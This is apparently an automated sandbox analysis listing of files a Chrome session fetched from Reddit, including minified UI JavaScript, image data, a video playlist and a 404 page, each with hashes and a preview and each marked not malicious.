                                                  Preview:RIFF:?..WEBPVP8 .?..P....*.. .>Q(.F...!!.I#@..en.v?..........d...9...........F.g......^.m._.W..8./...G...........K.....?......R............?..................oP.............S._....?.....g......._._..=.m...........?.....?.......K.......O.........~....U.........WJ.S...[...g...?.................O./D..}..../..]...Vy.._...._............A.s...o.W.O...=H......p......s................7../.M..............y....{VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...Y..m...h..VD.[}."Z-..-..j..o.dKE..%...FkG..G..\)..."..Q....v..M......./j..o.dKE..$..d1...%..)ONnG ../.....9.(.."...QP.h.VD.[}.".N_..|...|.......a.{....J...F.l...aC5l.R...X._..Z.....H;....Y....S5...x..H...d{.Gq...D....E..HH&...{.....X.1].....i..Ak.%!T.+..{.4"....,74..c.R..?.MVF.@.U
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1807)
                                                  Category:downloaded
                                                  Size (bytes):1859
                                                  Entropy (8bit):5.164749746736515
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BDE8887A56D6B5D3C39A54E960587693
                                                  SHA1:1B5BE76162C06850C534C4E8A5119BABC21638F5
                                                  SHA-256:CE937A4A25948F313F471A5F86DBD5413696F8EBC0B2F4542043D72DA28518DB
                                                  SHA-512:3A2AD39E28B25BD367EAACA1BB1BC08A8043E6B465D65C81871BC5DEF4FEA488CE24239C3BEF95FB964B2C9A5A228E948A4EC242A66228FE276BA8B506BAE22B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/follow-button-6c9f957a.js
                                                  Preview:import{t,_ as o,n as e,au as i,K as s,O as l,e as n}from"./shell-4994f581.js";import{s as r,x as d}from"./icon-4d9be652.js";let a=class extends r{constructor(){super(...arguments),this.isDesktop=!1,this.isLoggedIn=!1,this.isFollowed=!1,this.trackingSource="profile",this.toggleLoadingIcon=()=>{const t=this.isFollowed?".unfollow-button":".follow-button",o=this.querySelector(`${t} .loading-icon`),e=this.querySelector(`${t} .button-leading-icon`)?.parentElement;if(o?.classList.toggle("hidden"),e?.classList.toggle("hidden"),!this.isDesktop){const o=this.querySelector(`${t} .button-text`);o?.classList.toggle("hidden")}}}connectedCallback(){super.connectedCallback(),this.addEventListener("click",this.onClick)}disconnectedCallback(){super.disconnectedCallback(),this.removeEventListener("click",this.onClick)}async onClick(){if(this.redditorId&&this.isLoggedIn){const t={input:{accountId:this.redditorId,state:this.isFollowed?i.None:i.Followed}};this.toggleLoadingIcon();try{const o=await s({operat
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 640x1138, components 3
                                                  Category:dropped
                                                  Size (bytes):44529
                                                  Entropy (8bit):7.941043412296357
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3BD85649520CDCF89587FB50057DEA35
                                                  SHA1:A6B88793100BBFE7615E00609C25ED70FD7EEB71
                                                  SHA-256:B39BE77D1796849DE7A8E6DC451CBEE55714EAF9645ABD95376619D182FA03B7
                                                  SHA-512:59E8CD938EC6CE3689804DBA21510B03B0CD9B92D42FF6E2CB0FDC867876823C1DB250B31EC5AEA16DA475E60BE4DC17AEEC6BB3A8F0028BFAAD104E8981A011
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......r....".................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................EE..TQQEE...................Z+|..;z.I...nw...o...X.....rt.Z}..'..yz'.=.j.'..;..}b>+..]_'...c.........s......K..C..r........H...u.................D|J.fs.........^}m.i.......C..v.3_.UO....e?O....b?,.....~......?-..c.^G.<....Sm..+.,.O*..o..G......}...s}....]U|..+..+.m,R.3e.......>1.......%....W.nq.0...Q...E..m..ll
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2727)
                                                  Category:downloaded
                                                  Size (bytes):2796
                                                  Entropy (8bit):5.151916067674458
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:91EEF4C63AECE358FF7A3139FBAB4F16
                                                  SHA1:018A1378A0E410A84CDDF88FF63E2DA9F9A49655
                                                  SHA-256:94402CFE57551F735FC57D8246493719E022278878EB50FC2CF2140C06F899C1
                                                  SHA-512:6C62627898E68ECD12B3F90B234EF4CF263672445643429BAAB5A0238C2D5FF6B8B2B746C9396D7A0B936E87D410FD39F723BFED2A130676C7F151F1BF27E15D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/qr-code-modal-upsell-client-js-69907f68.js
                                                  Preview:import{_ as e,n as t,am as i,b8 as n,gx as r,e as s}from"./shell-4994f581.js";import{x as l,a}from"./icon-4d9be652.js";const d=e=>e instanceof HTMLButtonElement||e instanceof HTMLAnchorElement||["button","link","menuitem","tab","checkbox","combobox","gridcell","application","treeitem"].includes(e?.getAttribute("role")??"");class o extends n{constructor(){super(...arguments),this._triggerElement=null,this.keydown=!1,this.dialogId="",this.noModal=!1,this.handleClick=()=>{this.keydown||this.sendActivatedEvent()},this.handleKeydown=e=>{"Enter"===e.key&&(this.keydown=!0)},this.handleKeyup=e=>{"Enter"===e.key&&!0===this.keydown&&(this.keydown=!1,this.sendActivatedEvent())},this.handleBlur=()=>{this.keydown=!1}}set triggerElement(e){const t=this._triggerElement?.getAttribute("aria-expanded")??!1,i=this._triggerElement,n=e;i&&(i?.removeAttribute("aria-haspopup"),i?.removeAttribute("aria-expanded"),i?.removeEventListener("click",this.handleClick),i?.removeEventListener("keydown",this.handleKeyd
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1277)
                                                  Category:downloaded
                                                  Size (bytes):1342
                                                  Entropy (8bit):5.145286998224561
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1B47F6A0DDF73357745D2ABA63563F94
                                                  SHA1:47C2A6E84C910343BF5306151982BE8399A0DA97
                                                  SHA-256:7C62C451F51A7F6A412C1C3590B7E0E152ADD65AF8ED4DD8DC17F16EFA075258
                                                  SHA-512:53EDF9FD08D5600C7B453013C00314DD6AB0A438D8A0CC917F17973407D1A774EC78F938E8543C349E6D0A4D836A3F613166DE5EBAA1B866646B647AA0A79E7F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/reddit-header-action-items-ef3cf68d.js
                                                  Preview:import{_ as e,e as t,E as i}from"./shell-4994f581.js";import{s}from"./icon-4d9be652.js";let n=class extends s{constructor(){super(...arguments),this.windowEvents=new i(this,(()=>window)),this.setupEls=()=>{this.search=this.querySelector("reddit-search-large"),this.secondaryButton=this.querySelector('[data-part="secondary"]'),this.campaignButton=this.querySelector('[data-part="campaign"]')},this.handleResize=function(e){let t;const i=()=>void 0!==t;function s(...s){i()||(t=window.requestAnimationFrame((()=>{e.apply(this,s),t=void 0})))}return s.cancel=()=>{void 0!==t&&(window.cancelAnimationFrame(t),t=void 0)},s.pending=i,s}((()=>{const{search:e,secondaryButton:t,campaignButton:i}=this,s=i?.firstElementChild,n=t?.firstElementChild;if(!e||!n||!s)return;a(t,i);const r=()=>0!==c(s).width&&c(e).right>c(s).left-d;r()&&(o(t),r()&&o(i))})),this._resize=this.windowEvents.define("resize",this.handleResize)}connectedCallback(){super.connectedCallback(),this.setupEls(),this.handleResize()}createRe
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2289)
                                                  Category:downloaded
                                                  Size (bytes):2335
                                                  Entropy (8bit):5.147517636710172
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ADB5E52FFDE212758D13F39F22E093F8
                                                  SHA1:67FA4B16004883D165552DD181666E2B58D6FA08
                                                  SHA-256:2DFA5871FB87F08834B46703731C90EB567CA390267043A4A83A0DFF169CE8C2
                                                  SHA-512:E359BEF124E4E47787B899EFFA1B29552FA4AEF20E202EFC66720793B6FFB55DD363B4432938D42BA8D60CFA4FC4636CA45A8502300B782EEB98D178F46F04D8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/helpers-82480d34.js
                                                  Preview:import{b as n,cT as o}from"./shell-4994f581.js";import{O as e,ao as a,cx as t,af as s,cy as c,cz as i}from"./club-award-confirmation-client-js-b22d6f4f.js";const u="click",r="view",p="onboarding",_="xpromo",m="desktop_auth_prompt";var l;function f(o,a,t){return n({source:e,action:"resolve",noun:o},{action_info:{reason:t,type:a}})}function y(o){return n({source:e,action:"report_clone",noun:o})}!function(n){n.LOGIN="login",n.SIGNUP="signup",n.OPEN_APP="open_app",n.GOOGLE_SSO="google_sso",n.APPLE_SSO="apple_sso",n.EMAIL="email",n.CLOSE="close",n.PHONE="phone"}(l||(l={}));const b=o=>n({source:e,action:a,noun:o}),d=o=>n({source:e,action:t,noun:o}),h=o=>n({source:i,action:t,noun:o??"unknown"}),v=(e,a)=>n({source:e,action:"submit",noun:e===o.EnterPhone?"enter_phone":"otp"},{action_info:{type:a?"success":"fail"}}),g=()=>n({source:o.OTP,action:s,noun:"login_complete"}),O=e=>n({source:o.OTP,action:s,noun:"signup_complete"},{action_info:{type:e?"success":"fail"}}),P=()=>n({source:"update_phone_nu
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):370
                                                  Entropy (8bit):4.934618978300746
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FB55E5FD396559E3F8C1BEEF9B32E3AE
                                                  SHA1:F5435848C2C6BF85FB83B3D7298CBA1806E48D0E
                                                  SHA-256:E295AEE58F9B5F6F756BA0B2ED1AF99BCF3DD8462A96F6F006C7BBE9410CE9B6
                                                  SHA-512:248DF1D1192615120EEB44123A8ABCA1A2A3D368C93A8184BA966DC6C47F3FA994250E4D0E899B75E1815372A26710E0A7AFF1A72B11CD7C65C6A6FA7F00B02F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/dsa-transparency-modal-provider-client-js-d42de5ac.js
                                                  Preview:import"./dsa-transparency-modal-client-js-68587b84.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import"./app-selector-client-js-489f074c.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./index-56e4320e.js";.//# sourceMappingURL=dsa-transparency-modal-provider-client-js-d42de5ac.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1531)
                                                  Category:downloaded
                                                  Size (bytes):1582
                                                  Entropy (8bit):5.464306690078141
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0AD0ABFFC7720D8DDE79C02A06F1AFBC
                                                  SHA1:FFA6CC68CF3C8D6B809261477270AE32DBCCB0A3
                                                  SHA-256:6446B2F98C7D4E892554395F0ED49EBDA930DA49F7E886070A5A609646F59E3A
                                                  SHA-512:B55A9AA88FA201A73D8B455EDC1AF791D61C2DE4D6C594D4653FD628EB82AB3B5B89303142678088150181C7C1B39E96C8C08CCDD3FBF4D142BF91C44A62675C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/content-tags-a63901fd.js
                                                  Preview:import{g as a,I as e,aB as s,aX as n,cG as t,bs as c,cH as l,x as i,cI as r,cJ as p}from"./icon-4d9be652.js";var N;!function(a){a.APP="APP",a.NSFW="NSFW",a.ORIGINAL="ORIGINAL",a.SPOILER="SPOILER",a.QUARANTINED="QUARANTINED"}(N||(N={}));const o=({attributes:i,children:r,appearance:p})=>{const{html:o,createElement:I}=a(),m={size:e.Small,attributes:{className:"inline-block",style:"vertical-align: text-bottom"}},A={[N.APP]:{className:"text-ai-plain",icon:s(m)},[N.NSFW]:{className:"text-category-nsfw",icon:n(m)},[N.ORIGINAL]:{className:"text-primary",icon:t(m)},[N.SPOILER]:{className:"text-category-spoiler",icon:c(m)},[N.QUARANTINED]:{className:"text-warning-content",icon:l(m)}},P=o`<span class="inline-block" aria-hidden="true">${[A[p].icon]}</span> <span class="font-semibold text-12 uppercase">${r}</span>`;return I("span",{...i,className:`flex items-center gap-2xs ${[A[p].className]}`,rpl:!0},P)},I=()=>{const a=i`<span class="inline-block" aria-hidden="true">${r({size:e.Small,attributes:{c
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x1387, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):101610
                                                  Entropy (8bit):7.99794829687524
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:BC5BD5D53ACB4B8A0B8A2EF550F0D465
                                                  SHA1:91C55356D30567F4E37F5766D17287D462C09A83
                                                  SHA-256:D4D155857B2570C0507D7202B780CB80329C7234E334925D80254A58FDE62757
                                                  SHA-512:439536FD2797E9C1E9B7BD065517B84B6911E9028F24DF223286EB422D38243771B6D3CEF3BC70ED6C5140B22EE0556979E3414B80E3ACD6A7BF67C1283BFAA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://preview.redd.it/aio-for-demanding-to-be-paid-after-wearing-something-v0-luhi4fjr1bwe1.jpg?width=640&crop=smart&auto=webp&s=3e26cbabdd244446c273c73a03bace63100eae06
                                                  Preview:RIFF...WEBPVP8 ...._...*..k.>Q$.E..!.Z.d8.......[.:.I.w... ...V..!...;...............Q.......u...3.7....{.....~......O.......{...3..._.?._..?Q...w.E..?./..#.........g...?@?..v...S.....?G?.?..|...u.+....._.............o....T_.?.{....E.........._.?h.....i...w.?...o...?..o?........;.......?........}.......c.....[....._.~A|w./._.?........_.>q.o._.......k.........z?.?.......w..r...g.........w...s...C.................o._..........{...o....G..............o.....~.|p{......?........O.?.?...............................B~#...o..`..?..........c..._......[............=..........B...\.....'.......}....o.....k..+...)[...y1,.B..+Gmy1,.C.....y...q.!..s%.....f.......k....m..;mR5}.=B.hD..~.Q.$~.Aj.P....aIQ.>:#a}.8Hv...........:..|../...w..6m.4...Jv.\.4.......IbX.V.`?'%...*.O..P5.{..z.&..J4.]8..WB....l....eNm...N.~.e.5t...!.j../`v..%@.,D..&......PJ.f.^g<....("....g..k.8)..o.G@;l.:....>..m..y1'.\M...'.Q).{..Gm.#_...a.Kt.~...}7.O....$K.!{r..K..D.n...}./
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1629)
                                                  Category:downloaded
                                                  Size (bytes):1683
                                                  Entropy (8bit):5.221261779368802
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FE5BBB5AE3585F0C6F9B1F017FEAF526
                                                  SHA1:8E0FA7502E6570F5AF543F593FFD235C8980B6DC
                                                  SHA-256:6B8A3AF60453801C22FCEA0EA26EC57B2E5E1B2EB6C1B2C2711495A16F74A9B9
                                                  SHA-512:23F1E057D0D6564D5C64CCF9CD7D2B84FFA3EE1A62458D507D1EE8467859004B2FB988FCAB98DC87444BB37C64CE1F83DB1350BEDD7AFFC6E9FD1AF6C7A4DEF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/pdp-back-button-308ac1d1.js
                                                  Preview:import{t as e,_ as t,n as i,E as a,u as n,v as s,e as o}from"./shell-4994f581.js";import{s as r,x as d,y as c,I as l}from"./icon-4d9be652.js";let p=class extends r{constructor(){super(...arguments),this._windowEvents=new a(this,(()=>window)),this.enableEscapeKey=!1,this.handleBackClick=()=>{if(void 0===window.navigation)return void history.back();if(!this.subredditPrefixedName&&!this.postId)return void history.back();const e=window.navigation.currentEntry;if(e&&e.url){const t=e.index,i=new URL(e.url);for(let e=t-1;e>=0;e--){const t=window.navigation.entries()[e];if(t.url){const e=new URL(t.url);if(e.host===i.host&&e.pathname!==i.pathname)return void window.navigation.traverseTo(t.key)}}}const t=this.subredditPrefixedName?`/${this.subredditPrefixedName}/`:"/";window.navigation.navigate(t)},this.handleEscKey=this._windowEvents.define("keydown",(e=>{if(this.enableEscapeKey&&"Escape"===e.key){if(e.target instanceof Element){const t=null!==e.target.closest('[contenteditable="true"]'),i=null
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:M3U playlist, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):1696
                                                  Entropy (8bit):5.245062193927847
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FB17F1FF874421F41B207BEA3039DDF5
                                                  SHA1:D224859AD74785BA8D0B8700F38FAF3556B1B532
                                                  SHA-256:78FE057B626718D2F747C12DE4F524C9B0CB288773F586D567773CC2B98784F9
                                                  SHA-512:B03C5AAA539CF38F5252EEA7FC7C515C61BC3FD48774E7ECD683E4B44917DA6F70F5DE6F755A055FD797CBCCAE1479376819F661F6B0F310C771CA885434E8AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://v.redd.it/m1lypa16y7we1/HLSPlaylist.m3u8?f=hd%2ChlsTrimLow%2ChlsSpecOrder2&v=1&a=1747936515%2CNTI1YzFlZGYwNmYxNWU2ZGZlYTc3YTNhNDU0MmFhMGZkNWE0OTdjNWUwNGZmNjM5MWU5YTYxYWZlNDcxOGE4MQ%3D%3D
                                                  Preview:#EXTM3U.#EXT-X-VERSION:4.#EXT-X-MEDIA:URI="HLS_AUDIO_64.m3u8",TYPE=AUDIO,GROUP-ID="6",NAME="audio 0",DEFAULT=YES,AUTOSELECT=YES.#EXT-X-MEDIA:URI="HLS_AUDIO_128.m3u8",TYPE=AUDIO,GROUP-ID="7",NAME="audio 0",DEFAULT=YES,AUTOSELECT=YES.#EXT-X-STREAM-INF:PROGRAM-ID=0,CLOSED-CAPTIONS=NONE,BANDWIDTH=1982111,AVERAGE-BANDWIDTH=1657974,RESOLUTION=720x900,FRAME-RATE=30,CODECS="avc1.4D401F,mp4a.40.2",AUDIO="7".HLS_720.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=0,CLOSED-CAPTIONS=NONE,BANDWIDTH=800821,AVERAGE-BANDWIDTH=671846,RESOLUTION=360x450,FRAME-RATE=30,CODECS="avc1.4D401E,mp4a.40.2",AUDIO="6".HLS_360.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=0,CLOSED-CAPTIONS=NONE,BANDWIDTH=1094764,AVERAGE-BANDWIDTH=951548,RESOLUTION=480x600,FRAME-RATE=30,CODECS="avc1.4D401F,mp4a.40.2",AUDIO="6".HLS_480.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=0,CLOSED-CAPTIONS=NONE,BANDWIDTH=1938611,AVERAGE-BANDWIDTH=1615296,RESOLUTION=720x900,FRAME-RATE=30,CODECS="avc1.4D401F,mp4a.40.2",AUDIO="6".HLS_720.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=0,CLOSED-C
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):4283
                                                  Entropy (8bit):7.834122256092823
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FC188A8BCFE6F655D38B544F7048614D
                                                  SHA1:23855E67A561815DB1AB97A16DA69EC7FF29C723
                                                  SHA-256:5BA74F48F328B9EC5F0A25AD9C017F846813009F639AC75581F795B17285EBF1
                                                  SHA-512:1C59B11AAD89830073ACA146028811A4E02DDAA36AE67A9CD5576DD661BCCC12120058D157EA46D1D7C4B9A7A1EC409C527BCFFC83BF6BDF0AF9F0ED783B6CFC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/ad1td4bx9ezz_t5_3nqvj/upvote
                                                  Preview:.PNG........IHDR..............>a.... cHRM..z%..............u0...`..:....o._.F...ZeXIfMM.*.............................J...........R.(.............................H.......H.....R.4....IDATx..{p..}.?g...+...%[.lc........?..........v...t.>.&..3-%).Ni:%i....q..Cy..u....1~..=.s..=.j.....}H.;....v...9.w......Cw.&..&..&..&..&..&..&..&..&..&..&..&..&..&..&..C`6_.B....n........Z.^)&.....;...>.....zE.g.............&.9.f.....d...<&@.R..#l..k....l.Y.>.z.?...|.ki`.0.........3......G....r..u....-...I.L..^){{d..W>":........SZ...X...}.f.y....F..4.R........v2..N.V.5.F9..R..'.l.~...N<L?...p.qh..$...V....V....S...H...w..&@..`....#.q.k..;.Q..J.^T..`2.....$..6....&@u.`....7.,+..;...8o}.K.<m.....Vv.O.wZg8.xq...../...T....n...C..;...q\..|JC...zF..$ow..N.[...4j....nWoc.O..{...:.L.....Ni.7{...?.}...SI$m.........noO....O_...A@..."..f>.q&H...6p.&@..u...'.E?_.p....M.R.n... ^....f...e/..[.HE..4.......'.`9[..........P...x...N..7T<..P..87x.P...e.[{......9..,.0..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3204)
                                                  Category:downloaded
                                                  Size (bytes):3272
                                                  Entropy (8bit):5.145915978418178
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4BC74DA3C4595D2A4E8C199DADCB22D5
                                                  SHA1:0D7E58B523B6A2126CE6BC679EF741BA8AD1A590
                                                  SHA-256:11AA3B1AC94F0257ED00D678783635FF6595EB691C023AF5AA9AED3B324C0FB3
                                                  SHA-512:0B4F9737EFDACD989CB8BBDFBA61603D8282A452194828F989173EA639908FA99DD92F39BF0D4A889DE962B986E3D40B25E1B97DA405C36159777D06C8575FF6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-comment-share-button-db23de80.js
                                                  Preview:import{a as t,_ as e,n as s,e as i,bf as n,t as o,J as a,v as r}from"./shell-4994f581.js";import{s as h}from"./icon-4d9be652.js";import{L as l}from"./expandable-section-header-e3f969c2.js";import{W as d,C as m}from"./with-share-687454db.js";import{P as u,Q as p}from"./club-award-confirmation-client-js-b22d6f4f.js";const c=d(t(h));let b=class extends c{constructor(){super(...arguments),this.permalink="",this.disabled=!1,this.isDesktopViewport=!1,this.isListItem=!1,this.shareMenuFeatureName=n,this.shareMenuTemplateId=m,this.useButton=!1,this.useMenu=!1,this.showFullButtons=!1,this.menuSize=l.Medium}static get styles(){return[o,a("/*\n * :host and button.share-button-list-item is necessary to increase specificity to override the default styles of the button\n */\n:host button.share-button-list-item {\n padding: 0;\n height: 2rem !important;\n border: none;\n border-radius: 0;\n color: var(--color-secondary);\n background-color: transparent;\n /*\n * This CSS was added to fix the
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):58093
                                                  Entropy (8bit):7.973138853373992
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2123277E4A356D471B4009A0351AB0DC
                                                  SHA1:2A0C9408565E76A7BB9DE763FCD361012E43D9AB
                                                  SHA-256:27F7C2C1360992833EC1ACBE79A387BFC00E1E817F8CD5CDA8EBCFAD0EDB20D6
                                                  SHA-512:091DB2067ECA4C77994234779099F2D0E5E62FC284F03EA58A4BCABE7C30B2527974DD330FCEE3D87078D3F57A04CA87EDE8E1EA0E98348D6FA7D5F90EB80705
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...............?1...IDATx..Y...q...9.r.....F.h......R.ER.l.d..H.B.#<..f......`.gbbb..dZ.)q$.$...&..@..vb.n.^{....9..pnUWc..4....q.P]].uo._f~....g.b-...z0..bR/u@. .)..R ...(I T..D~.E..A.H..p.G......]!T@DF..DD`.WTp..W&2.7...g.DT....D..2y.&.......A..c. #..3..". ....Dp.........D.....e..O.....**.X.q.~&2..,3....x..X..q.......@F..~...$...../...M@I.DU...HDvt^..P..%.5......._..#..;..L.B....@d"RA.........x"o..0...jJ..PSk..b`.W..:..L..^..x...?.x,.F. .d.....,.Z,.58..{../..:I.&.,...i..{........N1.PP.....DW...C.I........=x.AU..2[f.!8.!P...N.Y..N....P..PUQb.0...DK.5..D...1e.:.....k&Q.lPu...r.5........yD...Q..&l.6.....`yq..w.{K...@.02..{IE...O. ....P!a..M].UE....}...N.9./+...?.:.......WT#..ZKD.iPt..~Q.us....`....B@.1.H...!.....r....W3._..R...M[.C.....D...C-.S............Wi.A.@. ..)....@.<yK&.zj.NgW.TIbUFq...D:..E..".....f4 .!"yr..........#.........BC....Z...}.C....c.....'.#.6.. ...-c."8..u........$1@..kfH,....u......m.....ty..L#.....A...`....... .I+
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):548
                                                  Entropy (8bit):4.688532577858027
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                  SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                  SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                  SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://1.coisna.com/files/images/Logo.png
                                                  Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3194)
                                                  Category:downloaded
                                                  Size (bytes):3252
                                                  Entropy (8bit):5.193039252521913
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B03CD33CD58F675B3F89F8655951EB15
                                                  SHA1:E15F20980D3EB9DC5796B19C0DC2049444E8D098
                                                  SHA-256:9803B2B0632FB4C4400BA440FBD122BC337B32F98965023558B8D342D0303577
                                                  SHA-512:34C9E407B670A48F0802AB522CAA073249686DBC398C6D4C90D34C068D7E1EF13645FCAF7D5DD10FB2CE2387B8212320F5CCD846FCD00F36B4555E78A58BB72F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/promote-post-button-551d8c60.js
                                                  Preview:import{a as t,ah as s,P as e,c as o,t as i,T as a,K as d,O as n,v as r,bD as c,_ as p,n as h,g as u,e as l}from"./shell-4994f581.js";import{c as m,I as y}from"./content-action-button-5fdf727f.js";import{x as b,_ as A,s as I}from"./icon-4d9be652.js";import{P,b as v,a as g}from"./expandable-section-header-e3f969c2.js";var w;let T=w=class extends(t(I)){constructor(){super(...arguments),this.authorId="",this.postId="",this.subredditName="",this.viewType=s.CardView,this.isLoaded=!1,this.hasAnalytics=!1,this.promotedAdAccounts=[],this.pubsub=new e(this),this.handlePromotePostSuccess=({adAccount:t,postId:e})=>{if(e===this.postId&&this.viewType===s.CardView){this.hasAnalytics||(this.hasAnalytics=!0);this.promotedAdAccounts.find((s=>s.id===t.id))||this.promotedAdAccounts.push(t)}},this.handleClick=()=>{this.viewType===s.CardView&&this.hasAnalytics?this.dispatchEvent(o("toggle-promote-post-insights",{promotedAdAccounts:this.promotedAdAccounts})):this.identity&&P.activateAndOpenPromotePostModal({
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2146)
                                                  Category:downloaded
                                                  Size (bytes):2199
                                                  Entropy (8bit):5.073733120637661
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BF5DF5A4F51508086678BDAB4AC33CE4
                                                  SHA1:3690EE3C70CDDF628817E8EA13A6DEB986AC8964
                                                  SHA-256:1F44F4C6AF48018BAFC4BC48CEC29012C3B251926E585C0F311958856A918A89
                                                  SHA-512:D1590707A0697D4A30D443324080B64908D9B00B7EA8FC9DA2F4FCFF55D648A894D9FCF6413A24686DD0F2CFC8B8B3111B7F4CCE54D56DA8DD7AA7AB88A55B37
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-card-aba01d4b.js
